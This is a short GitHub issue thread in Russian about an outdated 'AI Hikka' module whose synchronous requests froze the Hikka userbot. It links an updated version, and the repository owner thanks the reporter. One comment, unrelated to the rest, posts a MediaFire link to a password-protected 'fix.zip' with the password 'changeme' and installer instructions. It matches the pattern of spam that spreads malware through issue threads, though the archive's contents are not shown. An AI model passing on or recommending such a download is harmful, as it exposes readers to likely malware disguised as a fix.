### ISSUE TITLE
AI Hikka старой версии

### ISSUE THREAD

**Issue by eremeyko** [Koshararu/Ghnotes#1]
Модуль AI Hikka старой версии, это может вызвать проблемы с использованием.
В старой версии использовались синхронные запросы. При долгом запросе зависала вся хикка — это проблема
Также была добавлена шифровка ключа API и доп инструкция (ссылка) при ошибке

Обнова: https://github.com/eremeyko/ne_Hikka/blob/master/AIHikka.py

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Koshararu** [comment]
Ты как мое репо нашел вообще? Обновил код. Спасибо, хоть у меня проблем и не возникало.

**Comment by uglyere** [comment]
Ну ты просто крутой)
